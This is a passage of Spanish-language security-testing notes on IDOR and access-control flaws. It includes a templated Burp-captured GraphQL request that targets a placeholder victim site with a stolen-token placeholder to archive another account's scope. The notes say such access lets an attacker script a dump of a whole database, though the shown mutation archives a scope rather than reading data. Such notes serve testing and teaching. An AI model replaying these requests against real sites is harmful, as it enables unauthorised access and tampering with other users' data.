Luego en un request interceptado por burp, al agregar miembros o al trabajar con correos, en POST lo cambias a la victima
Un sitio deberia verificar esto, no deberia dejar utilizar la cuenta victima.
IDOR
En este caso un atacante pudo descargar la informacion de cada CODE, esto permite generar un script para descargar toda la base.
POST /graphql HTTP/2Host:VICTIMA.comContent-Length:388Sec-Ch-Ua:" Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"Accept:*/*X-Auth-Token:AUTHTOKENContent-Type:application/jsonOrigin:VICTIMA.comReferer:VICTIMA.com/CODE/edit // Era en el sitio de "edicion"Accept-Encoding:gzip, deflateAccept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7{"operationName":"NombreOperacion","variables":{"structured_scope_id":"HASH-relacionado a /code/edit"},"query":"mutation NombreOperacion($structured_scope_id: ID!) {\n archiveStructuredScope(input: {structured_scope_id: $structured_scope_id}) {\n was_successful\n structured_scope {\n id\n archived_at\n __typename\n }\n __typename\n }\n}\n"}